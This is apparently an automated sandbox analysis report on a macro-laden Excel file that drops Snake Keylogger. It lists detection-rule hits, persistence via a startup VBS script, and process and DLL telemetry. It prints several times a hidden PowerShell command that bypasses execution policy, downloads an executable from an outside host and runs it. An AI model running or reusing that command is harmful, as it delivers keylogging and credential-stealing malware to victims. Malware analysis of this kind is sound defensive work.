              System Summary

              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
              Source: DGTCkacbSz.xlsx OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Source: 79E20000.0.dr OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Source: DGTCkacbSz.xlsx Stream path 'VBA/ThisWorkbook' : found hex strings
              Source: 79E20000.0.dr Stream path 'VBA/ThisWorkbook' : found hex strings
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe File dump: svcost.exe.5.dr 262244634
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\tmp667.exe
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 770B0000 page execute and read and write
              Source: DGTCkacbSz.xlsx OLE, VBA macro line: Private Sub Workbook_Open()
              Source: 79E20000.0.dr OLE, VBA macro line: Private Sub Workbook_Open()
              Source: DGTCkacbSz.xlsx OLE indicator, VBA macros: true
              Source: 79E20000.0.dr OLE indicator, VBA macros: true
              Source: 79E20000.0.dr Stream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.ShellQa1"hExecF
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: tmp667.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: svcost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/14@1/1
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DGTCkacbSz.xlsxJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR85B2.tmpJump to behavior
              Source: DGTCkacbSz.xlsxOLE indicator, Workbook stream: true
              Source: 79E20000.0.drOLE indicator, Workbook stream: true
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................R...............R.................O...........Jump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: DGTCkacbSz.xlsxReversingLabs: Detection: 39%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: DGTCkacbSz.xlsxInitial sample: OLE zip file path = xl/media/image1.png
              Source: 79E20000.0.drInitial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;Jump to behavior
              Source: Yara matchFile source: 5.2.tmp667.exe.48b0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_004242E0 push AC005BFAh; retf 5_2_004244BD
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00424340 push AC005BFAh; retf 5_2_004244BD
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00601247 pushfd ; retf 5_2_00601255
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D4B48 pushfd ; retf 5_2_006D4B49
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D58AB9 push 8C00440Dh; retf 5_2_00D58AC5
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D535F0 push ecx; retf 5_2_00D535F6
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D5363B push es; retf 5_2_00D53641
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_054035A6 push edi; retf 5_2_054035AC
